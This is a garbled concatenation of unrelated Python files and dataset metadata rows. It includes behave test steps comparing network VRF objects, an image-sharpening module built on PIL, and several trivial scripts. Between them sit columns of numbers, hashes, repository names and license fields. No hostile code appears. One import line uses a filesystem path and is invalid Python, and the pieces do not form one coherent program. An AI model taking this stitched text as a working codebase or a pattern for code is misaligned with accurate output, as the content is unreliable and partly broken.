@given(u'VRF o0002 should be equal to o0004')
def step_impl(context):
assert context.o0002 == context.o0004
@given(u'VRF o0003 should be equal to o0004')
def step_impl(context):
assert context.o0003 == context.o0004
@given(u'VRF YAML file should be equal to o0002')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf03",
groups=['eos'],
vrf_host_data=context.o0002,
test=True
)
@given(u'VRF YAML file should be equal to o0003')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf03",
groups=['eos'],
vrf_host_data=context.o0003,
test=True
)
@given(u'VRF YAML file should be equal to o0004')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf03",
groups=['eos'],
vrf_host_data=context.o0004,
test=True
)
@given(u'VRF o0011 should be equal to o0012')
def step_impl(context):
assert context.o0011 == context.o0012
@given(u'VRF o0011 should be equal to o0013')
def step_impl(context):
assert context.o0011 == context.o0013
@given(u'VRF o0011 should be equal to o0014')
def step_impl(context):
assert context.o0011 == context.o0014
@given(u'VRF o0012 should be equal to o0013')
def step_impl(context):
assert context.o0012 == context.o0013
@given(u'VRF o0012 should be equal to o0014')
def step_impl(context):
assert context.o0012 == context.o0014
@given(u'VRF o0013 should be equal to o0014')
def step_impl(context):
assert context.o0013 == context.o0014
@given(u'VRF o0021 should be equal to o0022')
def step_impl(context):
assert context.o0021 == context.o0022
@given(u'VRF o0021 should be equal to o0023')
def step_impl(context):
assert context.o0021 == context.o0023
@given(u'VRF o0021 should be equal to o0024')
def step_impl(context):
assert context.o0021 == context.o0024
@given(u'VRF o0022 should be equal to o0023')
def step_impl(context):
assert context.o0022 == context.o0023
@given(u'VRF o0022 should be equal to o0024')
def step_impl(context):
assert context.o0022 == context.o0024
@given(u'VRF o0023 should be equal to o0024')
def step_impl(context):
assert context.o0023 == context.o0024
@given(u'VRF o0101 should be equal to o0102')
def step_impl(context):
assert context.o0101 == context.o0102
@given(u'VRF o0101 should be equal to o0103')
def step_impl(context):
print("Cumulus VRF with Netconf not possible -> Not tested")
@given(u'VRF o0101 should be equal to o0104')
def step_impl(context):
assert context.o0101 == context.o0104
@given(u'VRF o0102 should be equal to o0103')
def step_impl(context):
print("Cumulus VRF with Netconf not possible -> Not tested")
@given(u'VRF o0102 should be equal to o0104')
def step_impl(context):
assert context.o0102 == context.o0104
@given(u'VRF o0103 should be equal to o0104')
def step_impl(context):
print("Cumulus VRF with Netconf not possible -> Not tested")
@given(u'VRF YAML file should be equal to o0102')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf01",
groups=['linux'],
vrf_host_data=context.o0102,
test=True
)
@given(u'VRF YAML file should be equal to o0103')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF YAML file should be equal to o0104')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf01",
groups=['linux'],
vrf_host_data=context.o0104,
test=True
)
@given(u'VRF o0201 should be equal to o0202')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
@given(u'VRF o0201 should be equal to o0203')
def step_impl(context):
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'VRF o0201 should be equal to o0204')
def step_impl(context):
assert context.o0201 == context.o0204
@given(u'VRF o0202 should be equal to o0203')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'VRF o0202 should be equal to o0204')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
@given(u'VRF o0203 should be equal to o0204')
def step_impl(context):
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'VRF YAML file should be equal to o0202')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
@given(u'VRF YAML file should be equal to o0203')
def step_impl(context):
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'VRF YAML file should be equal to o0204')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="spine02",
groups=['extreme_vsp'],
vrf_host_data=context.o0204,
test=True
)
@given(u'VRF o0301 should be equal to o0302')
def step_impl(context):
assert context.o0301 == context.o0302
@given(u'VRF o0301 should be equal to o0303')
def step_impl(context):
assert context.o0301 == context.o0303
@given(u'VRF o0301 should be equal to o0304')
def step_impl(context):
assert context.o0301 == context.o0304
@given(u'VRF o0302 should be equal to o0303')
def step_impl(context):
assert context.o0302 == context.o0303
@given(u'VRF o0302 should be equal to o0304')
def step_impl(context):
assert context.o0302 == context.o0304
@given(u'VRF o0303 should be equal to o0304')
def step_impl(context):
assert context.o0303 == context.o0304
@given(u'VRF o0311 should be equal to o0312')
def step_impl(context):
assert context.o0311 == context.o0312
@given(u'VRF o0311 should be equal to o0313')
def step_impl(context):
assert context.o0311 == context.o0313
@given(u'VRF o0311 should be equal to o0314')
def step_impl(context):
assert context.o0311 == context.o0314
@given(u'VRF o0312 should be equal to o0313')
def step_impl(context):
assert context.o0312 == context.o0313
@given(u'VRF o0312 should be equal to o0314')
def step_impl(context):
assert context.o0312 == context.o0314
@given(u'VRF o0313 should be equal to o0314')
def step_impl(context):
assert context.o0313 == context.o0314
@given(u'VRF o0321 should be equal to o0322')
def step_impl(context):
assert context.o0321 == context.o0322
@given(u'VRF o0321 should be equal to o0323')
def step_impl(context):
assert context.o0321 == context.o0323
@given(u'VRF o0321 should be equal to o0324')
def step_impl(context):
assert context.o0321 == context.o0324
@given(u'VRF o0322 should be equal to o0323')
def step_impl(context):
assert context.o0322 == context.o0323
@given(u'VRF o0322 should be equal to o0324')
def step_impl(context):
assert context.o0322== context.o0324
@given(u'VRF o0323 should be equal to o0324')
def step_impl(context):
assert context.o0323 == context.o0324
@given(u'VRF o0331 should be equal to o0332')
def step_impl(context):
assert context.o0331 == context.o0332
@given(u'VRF o0331 should be equal to o0333')
def step_impl(context):
assert context.o0331 == context.o0333
@given(u'VRF o0331 should be equal to o0334')
def step_impl(context):
assert context.o0331 == context.o0334
@given(u'VRF o0332 should be equal to o0333')
def step_impl(context):
assert context.o0332 == context.o0333
@given(u'VRF o0332 should be equal to o0334')
def step_impl(context):
assert context.o0332 == context.o0334
@given(u'VRF o0333 should be equal to o0334')
def step_impl(context):
assert context.o0333 == context.o0334
@given(u'VRF YAML file should be equal to o0302')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf05",
groups=['ios'],
vrf_host_data=context.o0302,
test=True
)
@given(u'VRF YAML file should be equal to o0303')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf05",
groups=['ios'],
vrf_host_data=context.o0303,
test=True
)
@given(u'VRF YAML file should be equal to o0304')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf05",
groups=['ios'],
vrf_host_data=context.o0304,
test=True
)
@given(u'VRF o0401 should be equal to o0402')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0401 should be equal to o0403')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0401 should be equal to o0404')
def step_impl(context):
assert context.o0401 == context.o0404
@given(u'VRF o0402 should be equal to o0403')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0402 should be equal to o0404')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0403 should be equal to o0404')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0405 should be equal to o0406')
def step_impl(context):
assert context.o0405 == context.o0406
@given(u'VRF YAML file should be equal to o0402')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF YAML file should be equal to o0403')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF YAML file should be equal to o0404')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="spine03",
groups=['iosxr'],
vrf_host_data=context.o0404,
test=True
)
@given(u'VRF o0411 should be equal to o0412')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0411 should be equal to o0413')
def step_impl(context):
assert context.o0411 == context.o0413
@given(u'VRF o0411 should be equal to o0414')
def step_impl(context):
assert context.o0411 == context.o0414
@given(u'VRF o0412 should be equal to o0413')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0412 should be equal to o0414')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0413 should be equal to o0414')
def step_impl(context):
assert context.o0413 == context.o0414
@given(u'VRF o0421 should be equal to o0422')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0421 should be equal to o0423')
def step_impl(context):
assert context.o0421 == context.o0423
@given(u'VRF o0421 should be equal to o0424')
def step_impl(context):
assert context.o0421 == context.o0424
@given(u'VRF o0422 should be equal to o0423')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0422 should be equal to o0424')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0423 should be equal to o0424')
def step_impl(context):
assert context.o0423 == context.o0424
@given(u'VRF o0501 should be equal to o0502')
def step_impl(context):
assert context.o0501 == context.o0502
@given(u'VRF o0501 should be equal to o0503')
def step_impl(context):
assert context.o0501 == context.o0503
@given(u'VRF o0501 should be equal to o0504')
def step_impl(context):
assert context.o0501 == context.o0504
@given(u'VRF o0502 should be equal to o0503')
def step_impl(context):
assert context.o0502 == context.o0503
@given(u'VRF o0502 should be equal to o0504')
def step_impl(context):
assert context.o0502 == context.o0504
@given(u'VRF o0503 should be equal to o0504')
def step_impl(context):
assert context.o0503 == context.o0504
@given(u'VRF YAML file should be equal to o0502')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf04",
groups=['junos'],
vrf_host_data=context.o0502,
test=True
)
@given(u'VRF YAML file should be equal to o0503')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf04",
groups=['junos'],
vrf_host_data=context.o0503,
test=True
)
@given(u'VRF YAML file should be equal to o0504')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf04",
groups=['junos'],
vrf_host_data=context.o0504,
test=True
)
@given(u'VRF o0601 should be equal to o0602')
def step_impl(context):
assert context.o0601 == context.o0602
@given(u'VRF o0701 should be equal to o0702')
def step_impl(context):
assert context.o0701 == context.o0702
@given(u'VRF o0701 should be equal to o0703')
def step_impl(context):
assert context.o0701 == context.o0703
@given(u'VRF o0701 should be equal to o0704')
def step_impl(context):
assert context.o0701 == context.o0704
@given(u'VRF o0702 should be equal to o0703')
def step_impl(context):
assert context.o0702 == context.o0703
@given(u'VRF o0702 should be equal to o0704')
def step_impl(context):
assert context.o0702 == context.o0704
@given(u'VRF o0703 should be equal to o0704')
def step_impl(context):
assert context.o0703 == context.o0704
@given(u'VRF YAML file should be equal to o0702')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf02",
groups=['nxos'],
vrf_host_data=context.o0702,
test=True
)
@given(u'VRF YAML file should be equal to o0703')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf02",
groups=['nxos'],
vrf_host_data=context.o0703,
test=True
)
@given(u'VRF YAML file should be equal to o0704')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf02",
groups=['nxos'],
vrf_host_data=context.o0704,
test=True
)
@given(u'I create a VRF object to test compare function named o9999')
def step_impl(context):
context.o9999 = ListVRF(
vrf_lst=list()
)
context.o9999.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id="1",
vrf_type="vrf",
l3_vni=NOT_SET,
rd="65123:1",
rt_imp="65123:1",
rt_exp="65123:1",
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o9999.vrf_lst.append(
VRF(
vrf_name="management",
vrf_id="2",
vrf_type="vrf",
l3_vni="100002",
rd="65123:100",
rt_imp="65123:100",
rt_exp="65123:100",
imp_targ="65123:100",
exp_targ="65123:100"
)
)
@given(u'I create a VRF object to test compare function with <rt_imp> named o9982')
def step_impl(context):
options = {
'compare': {
'rt_imp': True
}
}
context.o9982 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9982 without <rt_imp> named o9983')
def step_impl(context):
options = {}
context.o9983 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9982 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9982 != context.o9999
@given(u'I compare VRF o9983 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9983 == context.o9999
@given(u'I create a VRF object to test compare function with <rt_exp> named o9984')
def step_impl(context):
options = {
'compare': {
'rt_exp': True
}
}
context.o9984 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9984 without <rt_exp> named o9985')
def step_impl(context):
options = {}
context.o9985 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9984 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9984 != context.o9999
@given(u'I compare VRF o9985 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9985 == context.o9999
@given(u'I create a VRF object to test compare function with <imp_targ> named o9986')
def step_impl(context):
options = {
'compare': {
'imp_targ': True
}
}
context.o9986 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9986 without <imp_targ> named o9987')
def step_impl(context):
options = {}
context.o9987 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9986 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9986 != context.o9999
@given(u'I compare VRF o9987 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9987 == context.o9999
@given(u'I create a VRF object to test compare function with <exp_targ> named o9988')
def step_impl(context):
options = {
'compare': {
'exp_targ': True
}
}
context.o9988 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9988 without <exp_targ> named o9989')
def step_impl(context):
options = {}
context.o9989 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9988 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9988 != context.o9999
@given(u'I compare VRF o9989 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9989 == context.o9999
@given(u'I create a VRF object to test compare function with <vrf_id> named o9990')
def step_impl(context):
options = {
'compare': {
'vrf_id': True
}
}
context.o9990 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9990 without <vrf_id> named o9991')
def step_impl(context):
options = {}
context.o9991 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9990 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9990 != context.o9999
@given(u'I compare VRF o9991 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9991 == context.o9999
@given(u'I create a VRF object to test compare function with <vrf_type> named o9992')
def step_impl(context):
options = {
'compare': {
'vrf_type': True
}
}
context.o9992 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9992 without <vrf_type> named o9993')
def step_impl(context):
options = {}
context.o9993 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9992 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9992 != context.o9999
@given(u'I compare VRF o9993 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9993 == context.o9999
@given(u'I create a VRF object to test compare function with <l3_vni> named o9994')
def step_impl(context):
options = {
'compare': {
'l3_vni': True
}
}
context.o9994 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9994 without <l3_vni> named o9995')
def step_impl(context):
options = {}
context.o9995 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9994 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9994 != context.o9999
@given(u'I compare VRF o9995 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9995 == context.o9999
@given(u'I create a VRF object to test compare function with <rd> named o9996')
def step_impl(context):
options = {
'compare': {
'rd': True
}
}
context.o9996 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9996 without <rd> named o9997')
def step_impl(context):
options = {}
context.o9997 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9996 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9996 != context.o9999
@given(u'I compare VRF o9997 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9997 == context.o9999
def create_vrf_obj_for_compare(options):
obj = ListVRF(
vrf_lst=list()
)
obj.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id="1",
vrf_type="vrf",
l3_vni=NOT_SET,
rd="65123:1",
rt_imp="65123:1",
rt_exp="65123:1",
imp_targ=NOT_SET,
exp_targ=NOT_SET,
options=options
)
)
# AN ERROR OBJECT
obj.vrf_lst.append(
VRF(
vrf_name="management",
vrf_id="2734268734626487328764",
vrf_type="vrf-but-not-the-good-one",
l3_vni="100999999999999999002",
rd="65123:100999999999999999002",
rt_imp="65123:100999999999999999002",
rt_exp="65123:100999999999999999002",
imp_targ="65123:100999999999999999002",
exp_targ="65123:100999999999999999002",
options=options
)
)
return obj
@given(u'I Finish my VRF tests and list tests not implemented')
def step_impl(context):
print("| The following tests are not implemented :")
for test in context.test_not_implemented:
print(f"| {test}")
| 25.467801
| 95
| 0.615294
| 7,659
| 55,367
| 4.217
| 0.03695
| 0.048486
| 0.068797
| 0.112577
| 0.869528
| 0.796675
| 0.773515
| 0.746424
| 0.672611
| 0.658214
| 0
| 0.077907
| 0.288276
| 55,367
| 2,173
| 96
| 25.479521
| 0.741714
| 0.001066
| 0
| 0.543491
| 0
| 0
| 0.28285
| 0.061315
| 0
| 0
| 0
| 0
| 0.057793
| 1
| 0.118506
| false
| 0
| 0.015178
| 0
| 0.134267
| 0.00934
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
261aff944f30336e3d967b77bf79eaea1e3a0c4c
| 4,393
|
py
|
Python
|
src/sharpen/sharpen.py
|
forgetfulyoshi/sharpener
|
2f7294f9aa57b609594bbcfe32535f5e45665bb6
|
[
"Unlicense"
] | null | null | null |
src/sharpen/sharpen.py
|
forgetfulyoshi/sharpener
|
2f7294f9aa57b609594bbcfe32535f5e45665bb6
|
[
"Unlicense"
] | null | null | null |
src/sharpen/sharpen.py
|
forgetfulyoshi/sharpener
|
2f7294f9aa57b609594bbcfe32535f5e45665bb6
|
[
"Unlicense"
] | null | null | null |
#! /usr/bin/env python
from PIL import Image
def quad_sharpen(image, window_x, window_y, threshold):
"""Sharpen based on a quadratic summation.
Args:
image : The input image. Type must be PIL.Image.
window_x : The horizontal boundary over which to measure intensity.
window_y : The vertical boundary over which to measure intensity.
threshold : For every pixel in the produced image, if the original
image's pixel intensity was above this value then it is set to 255
in the new image. If the original intensity was below this value,
then the new image's pixel is set to zero.
Returns:
A new image containing the sharpness mapping of the original. The type
is also PIL.Image
"""
rows = image.size[0]
cols = image.size[1]
current_image_access = image.load()
new_image = Image.new(image.mode, image.size)
new_image_access = new_image.load()
for row in range(window_x + 2, rows - window_x):
for col in range(window_y + 2, cols - window_y - 2):
intensity = 0
for u in range(0, window_x):
for v in range(0, window_y):
step_1 = current_image_access[row + u, col + v]
step_2 = current_image_access[row + u - 2, col + v - 2]
intensity += pow(step_1 - step_2, 2)
if intensity < threshold:
new_image_access[row, col] = 0
else:
new_image_access[row, col] = 255
return new_image
def abs_sharpen(image, window_x, window_y, threshold):
"""Sharpen based on an absolute value summation.
Args:
image : The input image. Type must be PIL.Image.
window_x : The horizontal boundary over which to measure intensity.
window_y : The vertical boundary over which to measure intensity.
threshold : For every pixel in the produced image, if the original
image's pixel intensity was above this value then it is set to 255
in the new image. If the original intensity was below this value,
then the new image's pixel is set to zero.
Returns:
A new image containing the sharpness mapping of the original. The type
is also PIL.Image
"""
rows = image.size[0]
cols = image.size[1]
current_image_access = image.load()
new_image = Image.new(image.mode, image.size)
new_image_access = new_image.load()
for row in range(window_x, rows - window_x):
for col in range(window_y, cols - window_y):
intensity = 0
for u in range(0, window_x):
for v in range(0, window_y):
step_1 = current_image_access[row + u, col + v]
step_2 = current_image_access[row + u - 1, col + v]
intensity += abs(step_1 - step_2)
if intensity < threshold:
new_image_access[row, col] = 0
else:
new_image_access[row, col] = 255
return new_image
def sharpen(image, window_x, window_y, threshold, calc_style):
"""Generate an intensity image from a given image.
Args:
image (Image.Image): The original image, opened with Image.open()
window_x (int): The horizontal boundary over which to measure intensity.
window_y (int): The vertical boundary over which to measure intensity.
threshold (int): For every pixel in the produced image, if the original
image's pixel intensity was above this value then it is set to 255
in the new image. If the original intensity was below this value,
then the new image's pixel is set to zero.
calc_style (str): Method used to calculate intensity. Either 'quad' or 'abs'.
Returns:
Image.Image: The sharpened image
"""
print("[+] Format:", image.format)
print("[+] Size:", image.size)
print("[+] Mode:", image.mode)
if image.mode != 'L':
image = image.convert('L')
if calc_style == 'abs':
sharpened_image = abs_sharpen(image, window_x, window_y, threshold)
elif calc_style == 'quad':
sharpened_image = quad_sharpen(image, window_x, window_y, threshold)
else:
raise RuntimeError('Invalid intensity method: {}'.format(calc_style))
return sharpened_image
| 36.608333
| 85
| 0.620988
| 619
| 4,393
| 4.281099
| 0.169628
| 0.066415
| 0.042264
| 0.043019
| 0.783396
| 0.783396
| 0.783396
| 0.770189
| 0.738491
| 0.69434
| 0
| 0.013676
| 0.300933
| 4,393
| 119
| 86
| 36.915966
| 0.849235
| 0.445937
| 0
| 0.557692
| 0
| 0
| 0.029113
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.019231
| 0
| 0.134615
| 0.057692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
2623b10e21dcf4d2ff89b99e213e98056ebd27fd
| 13
|
py
|
Python
|
newpython.py
|
elinabao/firstproject
|
60b0f5a29c90329d7cd59a40f991f680962f6c61
|
[
"Apache-2.0"
] | null | null | null |
newpython.py
|
elinabao/firstproject
|
60b0f5a29c90329d7cd59a40f991f680962f6c61
|
[
"Apache-2.0"
] | null | null | null |
newpython.py
|
elinabao/firstproject
|
60b0f5a29c90329d7cd59a40f991f680962f6c61
|
[
"Apache-2.0"
] | null | null | null |
print ("ABC")
| 13
| 13
| 0.615385
| 2
| 13
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 13
| 1
| 13
| 13
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
263cd05f4826727cc0d56293263aec45c1c3e70c
| 85
|
py
|
Python
|
SV_Detection/SourceCode/DownstreamAnalysis/test.py
|
NCI-CGR/PacbioPipeline
|
cd6e6b511c5138e8999cf5f0152bc063b41966bd
|
[
"MIT"
] | null | null | null |
SV_Detection/SourceCode/DownstreamAnalysis/test.py
|
NCI-CGR/PacbioPipeline
|
cd6e6b511c5138e8999cf5f0152bc063b41966bd
|
[
"MIT"
] | 8
|
2021-06-10T21:59:42.000Z
|
2022-03-30T19:49:44.000Z
|
SV_Detection/SourceCode/DownstreamAnalysis/test.py
|
NCI-CGR/PacbioSequencingAnalysis
|
cd6e6b511c5138e8999cf5f0152bc063b41966bd
|
[
"MIT"
] | null | null | null |
from /scratch/lix33/lxwg/SourceCode/PacbioSV/SourceCode/Scripts/RunPacbioSV import *
| 42.5
| 84
| 0.847059
| 10
| 85
| 7.2
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024691
| 0.047059
| 85
| 1
| 85
| 85
| 0.864198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
268f35738f3f6b89fae968f8186abaecdaac7e4f
| 63
|
py
|
Python
|
Inventory.py
|
Lawrence-JD/Journey-To-Vauss
|
532502a008c373df19243e26b6faedf27d3577ef
|
[
"MIT"
] | null | null | null |
Inventory.py
|
Lawrence-JD/Journey-To-Vauss
|
532502a008c373df19243e26b6faedf27d3577ef
|
[
"MIT"
] | null | null | null |
Inventory.py
|
Lawrence-JD/Journey-To-Vauss
|
532502a008c373df19243e26b6faedf27d3577ef
|
[
"MIT"
] | null | null | null |
# For Journey to Vauss
# ETGG 1802 Jonathan Koch
import pygame
| 15.75
| 25
| 0.777778
| 10
| 63
| 4.9
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 0.190476
| 63
| 3
| 26
| 21
| 0.882353
| 0.698413
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
cd02b0a5f7c663f787a519ccffcfa52c7fb2dbdd
| 60
|
py
|
Python
|
app/ml_tools/helpers/__init__.py
|
educauchy/kaggle-tab-playground-aug21
|
e740b251b8ab95c309255a42d32c5f105dccb35e
|
[
"MIT"
] | null | null | null |
app/ml_tools/helpers/__init__.py
|
educauchy/kaggle-tab-playground-aug21
|
e740b251b8ab95c309255a42d32c5f105dccb35e
|
[
"MIT"
] | null | null | null |
app/ml_tools/helpers/__init__.py
|
educauchy/kaggle-tab-playground-aug21
|
e740b251b8ab95c309255a42d32c5f105dccb35e
|
[
"MIT"
] | null | null | null |
from .helpers import gen_submit
from .Logging import Logging
| 30
| 31
| 0.85
| 9
| 60
| 5.555556
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 60
| 2
| 32
| 30
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
cd23f8724df764fb0aa499018ee6040f7cd988bf
| 90
|
py
|
Python
|
mather.py
|
msnilsen/hackgt2019
|
0cf9e26fa0881aa0733a58eb788469af91709823
|
[
"Apache-2.0"
] | null | null | null |
mather.py
|
msnilsen/hackgt2019
|
0cf9e26fa0881aa0733a58eb788469af91709823
|
[
"Apache-2.0"
] | null | null | null |
mather.py
|
msnilsen/hackgt2019
|
0cf9e26fa0881aa0733a58eb788469af91709823
|
[
"Apache-2.0"
] | 1
|
2020-04-06T19:33:09.000Z
|
2020-04-06T19:33:09.000Z
|
f = open("crime.csv", "r")
print("beep")
print(f.readline())
print(f.readline())
f.close()
| 18
| 26
| 0.633333
| 15
| 90
| 3.8
| 0.6
| 0.210526
| 0.491228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077778
| 90
| 5
| 27
| 18
| 0.686747
| 0
| 0
| 0.4
| 0
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
cd725e52d30fdc87021051e808c3a4c9fa6a50c5
| 157
|
py
|
Python
|
ui.py
|
pranavbaburaj/my-contacts
|
753bae7fc6384a8e1f59c10d0e776ba0a22c08ff
|
[
"MIT"
] | 2
|
2021-03-29T18:30:41.000Z
|
2021-04-10T17:44:38.000Z
|
ui.py
|
pranavbaburaj/my-contacts
|
753bae7fc6384a8e1f59c10d0e776ba0a22c08ff
|
[
"MIT"
] | null | null | null |
ui.py
|
pranavbaburaj/my-contacts
|
753bae7fc6384a8e1f59c10d0e776ba0a22c08ff
|
[
"MIT"
] | null | null | null |
from flaskwebgui import FlaskUI #import FlaskUI class
#You can also call the run function on FlaskUI class instantiation
